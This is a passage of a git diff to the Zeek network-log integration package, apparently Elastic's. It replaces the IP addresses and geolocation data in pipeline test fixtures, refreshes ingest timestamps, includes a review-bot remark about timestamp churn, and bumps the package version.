certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CfGBt82PzCXzHa0iek", diff --git a/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json b/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json index b759967a5e9..d5324a0a333 100644 --- a/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json +++ b/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json 
@@ -54,7 +54,7 @@
 }
 },
 "event": {
- "ingested": "2021-08-11T19:18:42.255855100Z",
+ "ingested": "2021-12-09T13:51:15.427176300Z",
 "original": "{\"ts\":1476605878.714844,\"peer\":\"bro\",\"mem\":94,\"pkts_proc\":296,\"bytes_recv\":39674,\"events_proc\":723,\"events_queued\":728,\"active_tcp_conns\":1,\"active_udp_conns\":3,\"active_icmp_conns\":0,\"tcp_conns\":6,\"udp_conns\":36,\"icmp_conns\":2,\"timers\":797,\"active_timers\":38,\"files\":0,\"active_files\":0,\"dns_requests\":0,\"active_dns_requests\":0,\"reassem_tcp_size\":0,\"reassem_file_size\":0,\"reassem_frag_size\":0,\"reassem_unknown_size\":0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "metric"
@@ -125,7 +125,7 @@
 }
 },
 "event": {
- "ingested": "2021-08-11T19:18:42.255870500Z",
+ "ingested": "2021-12-09T13:51:15.427184700Z",
 "original": "{\"ts\":1476605878.714844,\"peer\":\"bro\",\"mem\":94,\"pkts_proc\":296,\"bytes_recv\":39674,\"events_proc\":723,\"events_queued\":728,\"active_tcp_conns\":1,\"active_udp_conns\":3,\"active_icmp_conns\":0,\"tcp_conns\":6,\"udp_conns\":36,\"icmp_conns\":2,\"timers\":797,\"active_timers\":38,\"files\":0,\"active_files\":0,\"dns_requests\":0,\"active_dns_requests\":0,\"reassem_tcp_size\":0,\"reassem_file_size\":0,\"reassem_frag_size\":0,\"reassem_unknown_size\":0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "metric"
diff --git a/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log b/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log
index 24ec750ea8f..f5ae4063423 100644
--- a/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log
+++ b/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log
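Review bot: The only change in both hunks is `event.ingested`, a run-time timestamp that moves on every regeneration of the expected files, so this fixture churns although nothing in the stats input changed; the weird and x509 expected files further down change in exactly the same way. Consider declaring `event.ingested` as a dynamic field in these data streams' pipeline test config so the comparison ignores it and a regeneration only touches fixtures whose input actually changed.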
@@ -1,2 +1,2 @@ -{"ts":1361916158.650605,"src":"192.168.1.1","dst":"8.8.8.8","proto":"udp"} -{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"8.8.8.8\",\"proto\":\"udp\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/traceroute.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} +{"ts":1361916158.650605,"src":"192.168.1.1","dst":"89.160.20.156","proto":"udp"} +{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"89.160.20.156\",\"proto\":\"udp\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/traceroute.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json b/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json index 825d679c07a..0e2655f1e89 100644 --- a/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json +++ b/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json 
@@ -8,27 +8,30 @@ "related": { "ip": [ "192.168.1.1", - "8.8.8.8" + "89.160.20.156" ] }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "8.8.8.8", - "ip": "8.8.8.8" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "zeek": {}, "source": { @@ -36,8 +39,8 @@ "ip": "192.168.1.1" }, "event": { - "ingested": "2021-08-11T19:18:42.556134300Z", - "original": "{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"8.8.8.8\",\"proto\":\"udp\"}", + "ingested": "2021-12-09T13:51:15.714980100Z", + "original": "{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"89.160.20.156\",\"proto\":\"udp\"}", "category": [ "network" ], @@ -62,22 +65,25 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "8.8.8.8", - "ip": "8.8.8.8" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "zeek": {}, "source": { 
@@ -97,15 +103,15 @@ "related": { "ip": [ "192.168.1.1", - "8.8.8.8" + "89.160.20.156" ] }, "host": { "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:42.556146900Z", - "original": "{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"8.8.8.8\",\"proto\":\"udp\"}", + "ingested": "2021-12-09T13:51:15.714984Z", + "original": "{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"89.160.20.156\",\"proto\":\"udp\"}", "category": [ "network" ], diff --git a/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log b/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log index a8d7a9cf884..1d3864e215f 100644 --- a/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log +++ b/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log 
@@ -1,2 +1,2 @@ -{"ts":1544405666.743509,"id.orig_h":"132.16.146.79","id.orig_p":0,"id.resp_h":"132.16.110.133","id.resp_p":8080,"tunnel_type":"Tunnel::HTTP","action":"Tunnel::DISCOVER"} -{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1544405666.743509,\"id.orig_h\":\"132.16.146.79\",\"id.orig_p\":0,\"id.resp_h\":\"132.16.110.133\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/tunnel.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} +{"ts":1544405666.743509,"id.orig_h":"89.160.20.156","id.orig_p":0,"id.resp_h":"89.160.20.156","id.resp_p":8080,"tunnel_type":"Tunnel::HTTP","action":"Tunnel::DISCOVER"} +{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1544405666.743509,\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":0,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/tunnel.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json b/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json index f8b240e2aa7..72d89700b42 100644 --- a/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json 
+++ b/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json @@ -7,29 +7,31 @@ }, "related": { "ip": [ - "132.16.146.79", - "132.16.110.133" + "89.160.20.156" ] }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 427, + "number": 29518, "organization": { - "name": "Air Force Systems Networking" + "name": "Bredband2 AB" } }, - "address": "132.16.110.133", + "address": "89.160.20.156", "port": 8080, - "ip": "132.16.110.133" + "ip": "89.160.20.156" }, "zeek": { "tunnel": { 
@@ -39,27 +41,30 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 427, + "number": 29518, "organization": { - "name": "Air Force Systems Networking" + "name": "Bredband2 AB" } }, - "address": "132.16.146.79", + "address": "89.160.20.156", "port": 0, - "ip": "132.16.146.79" + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-08-11T19:18:42.999085700Z", - "original": "{\"ts\":1544405666.743509,\"id.orig_h\":\"132.16.146.79\",\"id.orig_p\":0,\"id.resp_h\":\"132.16.110.133\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}", + "ingested": "2021-12-09T13:51:16.028946100Z", + "original": "{\"ts\":1544405666.743509,\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":0,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "Tunnel::DISCOVER", @@ -82,23 +87,26 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 427, + "number": 29518, "organization": { - "name": "Air Force Systems Networking" + "name": "Bredband2 AB" } }, - "address": "132.16.110.133", + "address": "89.160.20.156", "port": 8080, - "ip": "132.16.110.133" + "ip": "89.160.20.156" }, "zeek": { "tunnel": { 
@@ -108,23 +116,26 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 427, + "number": 29518, "organization": { - "name": "Air Force Systems Networking" + "name": "Bredband2 AB" } }, - "address": "132.16.146.79", + "address": "89.160.20.156", "port": 0, - "ip": "132.16.146.79" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" @@ -135,16 +146,15 @@ }, "related": { "ip": [ - "132.16.146.79", - "132.16.110.133" + "89.160.20.156" ] }, "host": { "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:42.999107700Z", - "original": "{\"ts\":1544405666.743509,\"id.orig_h\":\"132.16.146.79\",\"id.orig_p\":0,\"id.resp_h\":\"132.16.110.133\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}", + "ingested": "2021-12-09T13:51:16.028954900Z", + "original": "{\"ts\":1544405666.743509,\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":0,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "Tunnel::DISCOVER", diff --git a/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json b/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json index 3a0add4340c..519d8c92459 100644 --- a/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json +++ b/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json 
@@ -30,7 +30,7 @@
 "ip": "192.168.1.1"
 },
 "event": {
- "ingested": "2021-08-11T19:18:43.448336Z",
+ "ingested": "2021-12-09T13:51:16.462556600Z",
 "original": "{\"ts\":1543877999.99354,\"uid\":\"C1ralPp062bkwWt4e\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":64521,\"id.resp_h\":\"192.168.1.2\",\"id.resp_p\":53,\"name\":\"dns_unmatched_reply\",\"notice\":false,\"peer\":\"worker-6\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -59,7 +59,7 @@
 }
 },
 "event": {
- "ingested": "2021-08-11T19:18:43.448346500Z",
+ "ingested": "2021-12-09T13:51:16.462595Z",
 "original": "{\"ts\":1580227259.342809,\"name\":\"non_ip_packet_in_ethernet\",\"notice\":false,\"peer\":\"ens3f1-4\"}",
 "category": [
 "network"
@@ -115,7 +115,7 @@
 "name": "Lees-MBP.localdomain"
 },
 "event": {
- "ingested": "2021-08-11T19:18:43.448353600Z",
+ "ingested": "2021-12-09T13:51:16.462601800Z",
 "original": "{\"ts\":1543877999.99354,\"uid\":\"C1ralPp062bkwWt4e\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":64521,\"id.resp_h\":\"192.168.1.2\",\"id.resp_p\":53,\"name\":\"dns_unmatched_reply\",\"notice\":false,\"peer\":\"worker-6\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json b/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json
index 4337fac9cef..1d15735c259 100644
--- a/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json
+++ b/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json
@@ -210,7 +210,7 @@ "session_id": "FxZ6gZ3YR6vFlIocq3" }, "event": { - "ingested": "2021-08-11T19:18:43.816755500Z", + "ingested": "2021-12-09T13:51:16.805683700Z", "original": "{\"ts\":1543867200.143484,\"id\":\"FxZ6gZ3YR6vFlIocq3\",\"certificate.version\":3,\"certificate.serial\":\"2D00003299D7071DB7D1708A42000000003299\",\"certificate.subject\":\"CN=www.bing.com\",\"certificate.issuer\":\"CN=Microsoft IT TLS CA 5,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US\",\"certificate.not_valid_before\":1500572828.0,\"certificate.not_valid_after\":1562780828.0,\"certificate.key_alg\":\"rsaEncryption\",\"certificate.sig_alg\":\"sha256WithRSAEncryption\",\"certificate.key_type\":\"rsa\",\"certificate.key_length\":2048,\"certificate.exponent\":\"65537\",\"san.dns\":[\"www.bing.com\",\"dict.bing.com.cn\",\"*.platform.bing.com\",\"*.bing.com\",\"bing.com\",\"ieonline.microsoft.com\",\"*.windowssearch.com\",\"cn.ieonline.microsoft.com\",\"*.origin.bing.com\",\"*.mm.bing.net\",\"*.api.bing.com\",\"ecn.dev.virtualearth.net\",\"*.cn.bing.net\",\"*.cn.bing.com\",\"ssl-api.bing.com\",\"ssl-api.bing.net\",\"*.api.bing.net\",\"*.bingapis.com\",\"bingsandbox.com\",\"feedback.microsoft.com\",\"insertmedia.bing.office.net\",\"r.bat.bing.com\",\"*.r.bat.bing.com\",\"*.dict.bing.com.cn\",\"*.dict.bing.com\",\"*.ssl.bing.com\",\"*.appex.bing.com\",\"*.platform.cn.bing.com\",\"wp.m.bing.com\",\"*.m.bing.com\",\"global.bing.com\",\"windowssearch.com\",\"search.msn.com\",\"*.bingsandbox.com\",\"*.api.tiles.ditu.live.com\",\"*.ditu.live.com\",\"*.t0.tiles.ditu.live.com\",\"*.t1.tiles.ditu.live.com\",\"*.t2.tiles.ditu.live.com\",\"*.t3.tiles.ditu.live.com\",\"*.tiles.ditu.live.com\",\"3d.live.com\",\"api.search.live.com\",\"beta.search.live.com\",\"cnweb.search.live.com\",\"dev.live.com\",\"ditu.live.com\",\"farecast.live.com\",\"image.live.com\",\"images.live.com\",\"local.live.com.au\",\"localsearch.live.com\",\"ls4d.search.live.com\",\"mail.live.com\",\"mapindia.live.com\
",\"local.live.com\",\"maps.live.com\",\"maps.live.com.au\",\"mindia.live.com\",\"news.live.com\",\"origin.cnweb.search.live.com\",\"preview.local.live.com\",\"search.live.com\",\"test.maps.live.com\",\"video.live.com\",\"videos.live.com\",\"virtualearth.live.com\",\"wap.live.com\",\"webmaster.live.com\",\"webmasters.live.com\",\"www.local.live.com.au\",\"www.maps.live.com.au\"]}", "id": "FxZ6gZ3YR6vFlIocq3", "type": [ 
@@ -441,7 +441,7 @@ "session_id": "FxZ6gZ3YR6vFlIocq3" }, "event": { - "ingested": "2021-08-11T19:18:43.816768700Z", + "ingested": "2021-12-09T13:51:16.805692200Z", "original": "{\"ts\":1543867200.143484,\"id\":\"FxZ6gZ3YR6vFlIocq3\",\"certificate.version\":3,\"certificate.serial\":\"2D00003299D7071DB7D1708A42000000003299\",\"certificate.subject\":\"CN=www.bing.com\",\"certificate.issuer\":\"CN=Microsoft IT TLS CA 5,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US\",\"certificate.not_valid_before\":1500572828.0,\"certificate.not_valid_after\":1562780828.0,\"certificate.key_alg\":\"rsaEncryption\",\"certificate.sig_alg\":\"sha256WithRSAEncryption\",\"certificate.key_type\":\"rsa\",\"certificate.key_length\":2048,\"certificate.exponent\":\"65537\",\"san.dns\":[\"www.bing.com\",\"dict.bing.com.cn\",\"*.platform.bing.com\",\"*.bing.com\",\"bing.com\",\"ieonline.microsoft.com\",\"*.windowssearch.com\",\"cn.ieonline.microsoft.com\",\"*.origin.bing.com\",\"*.mm.bing.net\",\"*.api.bing.com\",\"ecn.dev.virtualearth.net\",\"*.cn.bing.net\",\"*.cn.bing.com\",\"ssl-api.bing.com\",\"ssl-api.bing.net\",\"*.api.bing.net\",\"*.bingapis.com\",\"bingsandbox.com\",\"feedback.microsoft.com\",\"insertmedia.bing.office.net\",\"r.bat.bing.com\",\"*.r.bat.bing.com\",\"*.dict.bing.com.cn\",\"*.dict.bing.com\",\"*.ssl.bing.com\",\"*.appex.bing.com\",\"*.platform.cn.bing.com\",\"wp.m.bing.com\",\"*.m.bing.com\",\"global.bing.com\",\"windowssearch.com\",\"search.msn.com\",\"*.bingsandbox.com\",\"*.api.tiles.ditu.live.com\",\"*.ditu.live.com\",\"*.t0.tiles.ditu.live.com\",\"*.t1.tiles.ditu.live.com\",\"*.t2.tiles.ditu.live.com\",\"*.t3.tiles.ditu.live.com\",\"*.tiles.ditu.live.com\",\"3d.live.com\",\"api.search.live.com\",\"beta.search.live.com\",\"cnweb.search.live.com\",\"dev.live.com\",\"ditu.live.com\",\"farecast.live.com\",\"image.live.com\",\"images.live.com\",\"local.live.com.au\",\"localsearch.live.com\",\"ls4d.search.live.com\",\"mail.live.com\",\"mapindia.live.com\
",\"local.live.com\",\"maps.live.com\",\"maps.live.com.au\",\"mindia.live.com\",\"news.live.com\",\"origin.cnweb.search.live.com\",\"preview.local.live.com\",\"search.live.com\",\"test.maps.live.com\",\"video.live.com\",\"videos.live.com\",\"virtualearth.live.com\",\"wap.live.com\",\"webmaster.live.com\",\"webmasters.live.com\",\"www.local.live.com.au\",\"www.maps.live.com.au\"]}", "id": "FxZ6gZ3YR6vFlIocq3", "type": [ diff --git a/packages/zeek/manifest.yml b/packages/zeek/manifest.yml index acf1bf38633..7b53a4ae2eb 100644 --- a/packages/zeek/manifest.yml +++ b/packages/zeek/manifest.yml @@ -1,6 +1,6 @@ name: zeek title: Zeek Logs -version: 1.5.0 +version: 1.5.1 release: ga description: Collect and parse logs from Zeek network security with Elastic Agent. type: integration